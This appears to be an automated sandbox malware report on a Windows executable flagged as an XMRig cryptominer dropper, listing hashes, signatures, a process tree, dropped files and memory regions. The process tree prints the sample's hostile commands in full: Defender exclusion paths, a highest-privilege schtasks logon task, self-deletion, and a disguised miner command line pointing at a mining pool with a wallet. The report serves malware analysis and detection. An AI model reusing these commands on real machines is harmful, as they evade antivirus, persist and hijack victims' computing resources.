Analysis

  • max time kernel
    0s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/12/2023, 08:36

General

  • Target

    60396d247dfaabf972886d2ce21ea36a.exe

  • Size

    45KB

  • MD5

    60396d247dfaabf972886d2ce21ea36a

  • SHA1

    e8d12a9c5b5052174c2da49a894f7d1dff632e2f

  • SHA256

    71738fa14048ec5a7bec852fb4551f35d49cb790f6ea390e8308cfc8a5fa91c6

  • SHA512

    23c39d432572389287b53e9383e70b40fd2b7f6eeee36a46a79201ce3d0b5d98b1b33510ee4696fc5b0fccbe22a9d066a256a9c0c407ea48716066aae4891f3b

  • SSDEEP

    768:GC9qgMBtfGBLpu5mA92qPesOjQxBmo960hW9gmw4QkvOeMTYF9RcUIgliZ:GCjMrfSUmA9TPeaxBZ6z+pkvD7F9R3QZ

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 11 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\60396d247dfaabf972886d2ce21ea36a.exe
    "C:\Users\Admin\AppData\Local\Temp\60396d247dfaabf972886d2ce21ea36a.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5096
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:384
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        3⤵
          PID:3176
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
            4⤵
            • Creates scheduled task(s)
            PID:1372
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
          3⤵
            PID:752
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\60396d247dfaabf972886d2ce21ea36a.exe"
          2⤵
            PID:3136
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
          1⤵
          • Creates scheduled task(s)
          PID:3284
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
          1⤵
            PID:1392
          • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
            C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\60396d247dfaabf972886d2ce21ea36a.exe"
            1⤵
              PID:2768
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                2⤵
                  PID:844
                • C:\Windows\system32\services64.exe
                  "C:\Windows\system32\services64.exe"
                  2⤵
                    PID:1928
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                      3⤵
                        PID:3968
                  • C:\Windows\system32\cmd.exe
                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                    1⤵
                      PID:5084
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                        2⤵
                          PID:4568
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                          2⤵
                            PID:1596
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                            2⤵
                              PID:2656
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                              2⤵
                                PID:3144
                            • C:\Windows\system32\choice.exe
                              choice /C Y /N /D Y /T 3
                              1⤵
                                PID:4704
                              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                                1⤵
                                  PID:2208
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                                  1⤵
                                    PID:3176
                                  • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
                                    C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                                    1⤵
                                      PID:2552
                                      • C:\Windows\explorer.exe
                                        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=47z3fqW3wLPWJ4ACFetLRFTPAKWWqwp7fhF7gdaVDWfHYCiURua8iAr4mxbDH3aYV2AaqSTigrpDnKV9EM5Jjgs4TK1FnQq.first/password --pass= --cpu-max-threads-hint=40 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6ID8YbM855vsCcboXc0jIn+8jy3/V780HLJM3JPW2Fnb" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                        2⤵
                                          PID:4920
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                                          2⤵
                                            PID:2356
                                        • C:\Windows\system32\choice.exe
                                          choice /C Y /N /D Y /T 3
                                          1⤵
                                            PID:4288

                                          Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                  SHA1

                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                  SHA256

                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                  SHA512

                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

                                                  Filesize

                                                  539B

                                                  MD5

                                                  b245679121623b152bea5562c173ba11

                                                  SHA1

                                                  47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

                                                  SHA256

                                                  73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

                                                  SHA512

                                                  75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  da5c82b0e070047f7377042d08093ff4

                                                  SHA1

                                                  89d05987cd60828cca516c5c40c18935c35e8bd3

                                                  SHA256

                                                  77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

                                                  SHA512

                                                  7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  22310ad6749d8cc38284aa616efcd100

                                                  SHA1

                                                  440ef4a0a53bfa7c83fe84326a1dff4326dcb515

                                                  SHA256

                                                  55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

                                                  SHA512

                                                  2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  34f595487e6bfd1d11c7de88ee50356a

                                                  SHA1

                                                  4caad088c15766cc0fa1f42009260e9a02f953bb

                                                  SHA256

                                                  0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

                                                  SHA512

                                                  10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  6d42b6da621e8df5674e26b799c8e2aa

                                                  SHA1

                                                  ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                  SHA256

                                                  5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                  SHA512

                                                  53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  38a2262fb16df934106a14acb53aaeb0

                                                  SHA1

                                                  44995f3ecfeef1136485135b0818ae7b6a11fee3

                                                  SHA256

                                                  3f1f739bf5742b5962a330560d14b95ebdbdf8c4704e5852a4deddc01fce5dc1

                                                  SHA512

                                                  43dccc1860a4dc260f5aa0fa1fcb3723836a7459e69649ce6482c8f360a8a0b674f0e461d2f82f437104c13e1e96c2d7806d72016162361a440ac59ccd9090d4

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  ba169f4dcbbf147fe78ef0061a95e83b

                                                  SHA1

                                                  92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                                  SHA256

                                                  5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                                  SHA512

                                                  8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f33dip25.g5p.ps1

                                                  Filesize

                                                  60B

                                                  MD5

                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                  SHA1

                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                  SHA256

                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                  SHA512

                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                • C:\Users\Admin\AppData\Local\Temp\svchost64.exe

                                                  Filesize

                                                  37KB

                                                  MD5

                                                  071935689b1b5faa098eba621f510790

                                                  SHA1

                                                  6d6e87e89ee892f5a105a42341bf96d74d945a9f

                                                  SHA256

                                                  df0d30d77f07260e5ae9f6215bd93cb6f56b3e60a75c6ffabf7c80fbda6cf7a5

                                                  SHA512

                                                  dd484f00b84a7c9793a5781ad4dfe2f040cc8b018daf6a0895076610d90ac6e7ff76f2cec68d343b0269f924d89ea24143e35425473a9e49a345ff2fb8011bda

                                                • C:\Windows\System32\Microsoft\Libs\sihost64.exe

                                                  Filesize

                                                  7KB

                                                  MD5

                                                  8ad47f67976a518a91e62dea92cbfbc2

                                                  SHA1

                                                  9f3c5d6f42be8853445d61534e2b5d97ed6deabc

                                                  SHA256

                                                  d1b2659d6b0d1a7895f199ad4cbebd912517247d4b68e8708345118871928642

                                                  SHA512

                                                  a602d1bf3d2f0892c69e23b7a369426a5535289ca054241c5b8c35b387ba7af3a6a21d6cf2aca9171ce82b29f1cfca1e869c176410d658c977ae87c9efb36873

                                                • C:\Windows\system32\services64.exe

                                                  Filesize

                                                  45KB

                                                  MD5

                                                  60396d247dfaabf972886d2ce21ea36a

                                                  SHA1

                                                  e8d12a9c5b5052174c2da49a894f7d1dff632e2f

                                                  SHA256

                                                  71738fa14048ec5a7bec852fb4551f35d49cb790f6ea390e8308cfc8a5fa91c6

                                                  SHA512

                                                  23c39d432572389287b53e9383e70b40fd2b7f6eeee36a46a79201ce3d0b5d98b1b33510ee4696fc5b0fccbe22a9d066a256a9c0c407ea48716066aae4891f3b

                                                • memory/752-60-0x00000286DAED0000-0x00000286DAEE0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/752-61-0x00000286DAED0000-0x00000286DAEE0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/752-59-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/752-64-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/1584-14-0x000001F4A2A30000-0x000001F4A2A40000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/1584-15-0x000001F4A2A30000-0x000001F4A2A40000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/1584-18-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/1584-13-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/1584-8-0x000001F4A4B20000-0x000001F4A4B42000-memory.dmp

                                                  Filesize

                                                  136KB

                                                • memory/1596-120-0x0000025773450000-0x0000025773460000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/1596-119-0x0000025773450000-0x0000025773460000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/1596-118-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/1596-122-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/1928-159-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/1928-89-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/1928-91-0x0000000003590000-0x00000000035A0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/2208-195-0x0000000002AB0000-0x0000000002AC0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/2208-194-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/2208-177-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/2208-178-0x0000000002AB0000-0x0000000002AC0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/2208-176-0x0000000000190000-0x0000000000196000-memory.dmp

                                                  Filesize

                                                  24KB

                                                • memory/2552-161-0x00000000030B0000-0x00000000030C0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/2552-160-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/2552-185-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/2656-135-0x0000028D71220000-0x0000028D71230000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/2656-136-0x0000028D71220000-0x0000028D71230000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/2656-134-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/2656-138-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/2768-74-0x00000000011E0000-0x00000000011F2000-memory.dmp

                                                  Filesize

                                                  72KB

                                                • memory/2768-90-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/2768-75-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/2768-76-0x0000000001250000-0x0000000001260000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/2768-73-0x0000000000820000-0x000000000082E000-memory.dmp

                                                  Filesize

                                                  56KB

                                                • memory/2988-34-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/2988-30-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/2988-31-0x00000188AA670000-0x00000188AA680000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/2988-32-0x00000188AA670000-0x00000188AA680000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/3144-139-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/3144-152-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/3144-149-0x000001A1A2D90000-0x000001A1A2DA0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/3176-44-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/3176-47-0x0000013BE60B0000-0x0000013BE60C0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/3176-45-0x0000013BE60B0000-0x0000013BE60C0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/3176-49-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/4568-107-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/4568-102-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/4568-103-0x000002A768820000-0x000002A768830000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/4568-105-0x000002A768820000-0x000002A768830000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/4568-104-0x000002A768820000-0x000002A768830000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/4920-186-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-190-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-199-0x0000000002770000-0x0000000002790000-memory.dmp

                                                  Filesize

                                                  128KB

                                                • memory/4920-181-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-182-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-184-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-198-0x0000000002770000-0x0000000002790000-memory.dmp

                                                  Filesize

                                                  128KB

                                                • memory/4920-187-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-188-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-196-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-189-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-197-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-183-0x00000000026B0000-0x00000000026D0000-memory.dmp

                                                  Filesize

                                                  128KB

                                                • memory/4920-180-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-191-0x0000000002750000-0x0000000002770000-memory.dmp

                                                  Filesize

                                                  128KB

                                                • memory/4920-192-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/4920-193-0x0000000140000000-0x0000000140786000-memory.dmp

                                                  Filesize

                                                  7.5MB

                                                • memory/5096-72-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/5096-66-0x000000001C9B0000-0x000000001C9C0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/5096-65-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                • memory/5096-2-0x000000001C9B0000-0x000000001C9C0000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/5096-0-0x0000000000D80000-0x0000000000D90000-memory.dmp

                                                  Filesize

                                                  64KB

                                                • memory/5096-1-0x00007FFE2D9E0000-0x00007FFE2E4A1000-memory.dmp

                                                  Filesize

                                                  10.8MB